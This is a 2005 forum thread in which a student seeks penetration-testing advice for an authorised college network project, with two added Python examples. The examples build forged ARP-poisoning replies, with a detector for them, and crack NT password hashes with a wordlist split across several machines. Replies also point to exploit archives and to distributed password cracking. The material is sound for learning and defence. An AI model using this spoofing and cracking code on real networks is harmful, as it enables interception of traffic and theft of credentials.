February 12th, 2005, 09:36 PM
College project (Penetration testing)
Hey guys, first off I have written permission from both my tutor and network administrator for this so no worries about the legal aspect.
Now that's out of the way, I'm in my second year of an HND at my local college. Talking with my teacher about what could be a good idea for my major project, they suggested I try penetration testing as it would be something different for me as I usually do programming.
So talking with my network admins, they say it's OK as they've seen me around and heard stuff about me, so they think they can trust me. (Also if anything goes wrong they know where to come first!)
The network is made up of windows 2K work stations and each class room is switched. The server is running the latest windows server and using Active Directory.
I have a laptop running Mandrake Linux with some software such as ettercap, Ethereal, nmap (having trouble getting password sniffers on there but that should be soon) which I can take in and use.
Now the real challenge is to do as much manually as possible, because I have to document everything I do, and just using software to hack the network would make for a boring project.
I was wondering if you guys have any tips or advice about how to get started and what direction to take this?
Cheers in advance for your help
February 13th, 2005, 12:24 AM
If I were you I would start off here. Read up on the tools you will be using. Maybe try playing with a little Knoppix STD purely for the vast assortment of tools it offers.
February 13th, 2005, 12:35 AM
Plan your attack. Figure out how you are going to attack, what you are going to attack, objectives. Going in with no objective makes it very hard to stay focused. I mean, how do you know if you are there if you don't know where "there" is? Is your goal to just get access to the network? Or do you actually want to penetrate the server and get "root" access to it? Are you going for a DoS style attack and just dropping the network?
Also MAKE SURE you keep the admins up to speed with what you are doing. Like if you plan on trying a DoS attack, make sure they know so they don't freak out when stuff stops working. DON'T attack the whole network, or vital equipment. If it's equipment that when dropped stops a needed function, then don't go after it first. Also for the conclusion I would fix the problems you do find.
Look up current known exploits for things. MS puts up proof-of-concept code, and so do a lot of other companies, for known vulnerabilities in their OS.
But like I said before, establish your goals before you start; it will make research on how to attack a lot easier if you know what you are trying to accomplish.
February 13th, 2005, 12:44 AM
Hey guys, thanks for the posts so far.
I don't want to do a DoS as others do have to use the network and it isn't really my goal. My goal is to get "root" or one of the admin accounts. Sorry, should have said that before. I've been keeping the techies informed when I've been doing some tests so far, so I have that angle covered.
If someone has some ideas of angles of attack, or even some pointers as to holes in MS at the moment, that's what I really need. I can port steal and collect passwords, but they are encrypted and John the Ripper is taking forever to crack the passwords I have collected. Anyone know a better tool to use?
Thanks for what's been suggested so far.
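The poster mentions collecting passwords on a switched classroom network with ettercap. Ettercap can do that by ARP poisoning (a different technique from the port stealing the poster names, but the one that is easiest to show on the wire). The block below is an added example, not code from any poster on this thread: it builds the forged ARP reply such a tool sends, and then runs a small detector over a constructed four-frame "capture" that flags an IP whose claimed MAC changes, which is the kind of check the admins could deploy afterwards. All MAC and IP addresses are made up for the example; nothing is sent on a real interface.

```python
"""Added example (not from any poster): the ARP reply an ARP-poisoning tool such as
ettercap sends on a switched LAN, plus a detector that flags an IP whose claimed MAC
changes. All MAC/IP addresses and the "capture" below are constructed for the example."""
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST, ZERO_MAC = "ff:ff:ff:ff:ff:ff", "00:00:00:00:00:00"


def _mac(s: str) -> bytes:
    return bytes(int(part, 16) for part in s.split(":"))


def _ip(s: str) -> bytes:
    return bytes(int(part) for part in s.split("."))


def _fmt_mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def _fmt_ip(b: bytes) -> str:
    return ".".join(str(x) for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip) -> bytes:
    """Ethernet II frame carrying one ARP packet (RFC 826). Requests go to the broadcast
    MAC with a zero target hardware address; a poisoner sends op=2 with its own MAC as
    sender_mac but the gateway's (or victim's) IP as sender_ip."""
    eth_dst = target_mac if op == ARP_REPLY else BROADCAST
    eth = _mac(eth_dst) + _mac(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)  # htype=Ethernet, ptype=IPv4, hlen, plen, op
    arp += _mac(sender_mac) + _ip(sender_ip) + _mac(target_mac) + _ip(target_ip)
    return eth + arp


def parse_arp(frame: bytes):
    """Return the ARP fields of an Ethernet frame, or None if it is not IPv4-over-Ethernet ARP."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, op = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {
        "op": op,
        "sender_mac": _fmt_mac(frame[22:28]), "sender_ip": _fmt_ip(frame[28:32]),
        "target_mac": _fmt_mac(frame[32:38]), "target_ip": _fmt_ip(frame[38:42]),
    }


def detect_poisoning(frames):
    """Learn the first MAC seen for each sender IP; alert when a later ARP claims a
    different MAC for the same IP. Returns a list of (ip, first_mac, new_mac)."""
    learned, alerts = {}, []
    for frame in frames:
        p = parse_arp(frame)
        if p is None:
            continue
        ip, mac = p["sender_ip"], p["sender_mac"]
        if ip in learned and learned[ip] != mac:
            alerts.append((ip, learned[ip], mac))
        learned.setdefault(ip, mac)
    return alerts


# Constructed capture: a victim resolves the gateway, the gateway answers, then an
# attacker poisons both sides so traffic between them passes through the attacker.
GW_MAC, GW_IP = "00:11:22:33:44:01", "10.0.1.1"
VICTIM_MAC, VICTIM_IP = "00:11:22:33:44:50", "10.0.1.50"
ATTACKER_MAC = "00:aa:bb:cc:dd:ee"
SAMPLE_CAPTURE = [
    build_arp(ARP_REQUEST, VICTIM_MAC, VICTIM_IP, ZERO_MAC, GW_IP),
    build_arp(ARP_REPLY, GW_MAC, GW_IP, VICTIM_MAC, VICTIM_IP),
    build_arp(ARP_REPLY, ATTACKER_MAC, GW_IP, VICTIM_MAC, VICTIM_IP),  # "10.0.1.1 is at attacker"
    build_arp(ARP_REPLY, ATTACKER_MAC, VICTIM_IP, GW_MAC, GW_IP),      # "10.0.1.50 is at attacker"
]

if __name__ == "__main__":
    for ip, old, new in detect_poisoning(SAMPLE_CAPTURE):
        print(f"ALERT: {ip} moved from {old} to {new}")
```

The detector keeps the first MAC it sees for an IP as the baseline, so it also catches the second forged reply (the one aimed at the gateway), which a check that only watched the victim's own cache would miss. On a real network, feed it frames read from a capture file instead of the constructed list.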
February 13th, 2005, 05:02 AM
1st, yes, DoS would be a worthless point of attack. It has almost nothing to do with "pen" testing and any @#$ can do it. It nets very little info about your org unless you are going to test things like response policies and the like.
Start by documenting as much as you can about your network and configurations. Only then will you have a platform to analyze possible attack points. How big is the network BTW? What are your physical access limitations?
Also, if you really want to put some egg on faces for your project, think information leaks. Too much time is spent on "root" this and "root" that. From the inside out, there are many, many more risks to manage in addition to account attacks and privilege escalation. Security policies neither start nor end with computers and computer networks. Shoot, you might even choose to audit CM (configuration management) and disaster recovery policy and documentation...
Turn it into a real mind!#$ and turn that project into a job offer...
Post more info and I'm sure people here can help you get real crafty..
Peace and good luck!!
February 13th, 2005, 05:15 AM
Just google for "microsoft vulnerability", "microsoft exploit", "microsoft proof of concept" and prepare for a landslide. Also check out www.packetstormsecurity.nl as they have a good collection of all things security.
If someone has some idea's of angles of attack or even some pointers as to holes in MS at the moment thats what I really need.
As far as cracking the passwd files, try Cisilia, run atop openMosix! There was a thread on here recently regarding this. Or just google for Cisilia. Basically what you're doing is making a cluster focused on cracking that password file. Or just follow my advice on using Knoppix STD; it's all built in to the .ISO, and burning a disk is a lot easier than installing each package on each individual machine. Setup is pretty straightforward too. Hope this helps.
February 13th, 2005, 02:52 PM
Jonesy69, I think an important point to make in your project report would be physical access. It sounds like the intent of this is remote exploits (code, attacking services, etc.), but a mention of this aspect would be very beneficial. However, if there is no restriction on the types of access, you should include a short section on this attack vector because I can guarantee you it is the easiest to exploit in the environment you describe.
But if you have the ability to go sit down at one of these boxes, drop a specially crafted CD, floppy diskette, or USB flash drive into the system and 'own' it, that should be at least mentioned or documented.
One of the biggest tenets of information security is 'if they have physical access to the box, they own the box'. This is a concept that has a foundation in the realm of physical security, i.e. locksmiths. Technically, a safe is not rated on how 'hard' it is to penetrate, but on how long it would take to penetrate given a sustained level of effort. If you have a system with no floppy drive, no CD or DVD reader, no USB or IEEE 1394 ports, then you have made it marginally harder to physically crack. But don't leave me alone at the console with the intent to access it, or you'll regret the decision!
All the firewalls, antivirus, intrusion prevention, and host based security measures won't help you if I can pull the plug, crack the case, load a CD, and do my thing.
"Data is not necessarily information. Information does not necessarily lead to knowledge. And knowledge is not always sufficient to discover truth and breed wisdom." --Spaf
Anyone who is capable of getting themselves made president should on no account be allowed to do the job. --Douglas Adams (1952-2001)
"...people find it far easier to forgive others for being wrong than being right." - Albus Percival Wulfric Brian Dumbledore
February 13th, 2005, 04:05 PM
John is the fastest tool for cracking passwords on a single machine. It sounds like you have access to multiple computers though, so follow this tutorial if you want to speed up that cracking process.
Originally posted here by imp35713
I can port steal and collect passwords but they are encrypted and john the ripper is taking forever to crack the passwords I have collected. Anyone know a better tool to use?
As far as finding your exploits, I suggest two sites (one was already mentioned): www.k-otik.com and www.packetstormsecurity.nl. Most of the exploit code you'll find at those and other sites won't compile without some fixing and tweaking, but since you have a programming background, you shouldn't have a problem getting them into a usable form.
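Two things in this thread are worth seeing in code: what the "encrypted" passwords the original poster is feeding to John actually are on a Windows 2000/Active Directory network, and what the cluster-cracking advice (Cisilia on openMosix, or several Knoppix STD boxes) amounts to. The block below is an added example, not any poster's code or a John/Cisilia internal. It computes the NT hash (MD4 over the UTF-16LE password, the format stored in the SAM and in Active Directory) in pure Python, then runs a wordlist attack that is split into shards so each machine takes one shard. It assumes you hold raw NT hashes; the NTLM challenge/response material ettercap picks up off the wire needs a per-challenge variant of the same idea and is not covered here. The target hashes and the wordlist are constructed for the example.

```python
"""Added example (not any poster's code): NT password hashes in pure Python and a
wordlist attack sharded across machines. Assumes raw NT hashes (as in a SAM dump);
the hashes and wordlist below are constructed for the example."""
import struct

_R2_ORDER = (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)
_R3_ORDER = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
_MASK = 0xFFFFFFFF


def _rotl(x, s):
    return ((x << s) | (x >> (32 - s))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4. Broken as a general-purpose hash; implemented here only because
    the NT hash is MD4 and hashlib's md4 is often disabled in modern OpenSSL builds."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    bit_len = len(data) * 8
    data += b"\x80"                                   # padding: 1 bit, zeros, 64-bit LE length
    data += b"\x00" * ((56 - len(data) % 64) % 64)
    data += struct.pack("<Q", bit_len)
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(48):
            if i < 16:                                # round 1: F, words in order
                f, k, s, add = (b & c) | (~b & d), i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:                              # round 2: G, column-wise word order
                f, k, s, add = (b & c) | (b & d) | (c & d), _R2_ORDER[i - 16], (3, 5, 9, 13)[i % 4], 0x5A827999
            else:                                     # round 3: H, bit-reversed word order
                f, k, s, add = b ^ c ^ d, _R3_ORDER[i - 32], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            t = _rotl((a + (f & _MASK) + x[k] + add) & _MASK, s)
            a, b, c, d = d, t, b, c
        a0, b0, c0, d0 = (a0 + a) & _MASK, (b0 + b) & _MASK, (c0 + c) & _MASK, (d0 + d) & _MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> str:
    """NT hash as stored in the SAM / Active Directory: unsalted MD4 of the UTF-16LE
    password, as lowercase hex. No salt means one hash per candidate covers every user."""
    return md4(password.encode("utf-16-le")).hex()


def crack_shard(targets, wordlist, shard, nshards):
    """Hash every nshards-th candidate starting at index `shard` (round-robin split), so
    running shards 0..nshards-1 on different machines covers the whole wordlist with no
    machine repeating another's work. Returns {hash: plaintext} for the hashes it hit."""
    wanted = {h.lower() for h in targets}
    found = {}
    for idx, candidate in enumerate(wordlist):
        if idx % nshards != shard:
            continue
        h = nt_hash(candidate)
        if h in wanted:
            found[h] = candidate
    return found


# Constructed inputs (not captured data): two NT hashes and a small wordlist.
SAMPLE_TARGETS = [
    "8846f7eaee8fb117ad06bdd830b7586c",  # NT hash of "password"
    "31d6cfe0d16ae931b73c59d7e0c089c0",  # NT hash of "" (a blank password)
]
SAMPLE_WORDLIST = ["letmein", "password", "", "college", "Winter2005", "admin"]

if __name__ == "__main__":
    for shard in range(3):
        print(f"shard {shard}/3:", crack_shard(SAMPLE_TARGETS, SAMPLE_WORDLIST, shard, 3))
```

Run the three shards on three machines and merge the dictionaries they return; the round-robin split keeps the shards equal in size even when the wordlist is sorted by length or frequency. Because the NT hash is unsalted, checking one candidate against a whole dump of hashes costs a single MD4, which is why a wordlist attack against a large account database is so cheap and why a blank or dictionary password falls immediately.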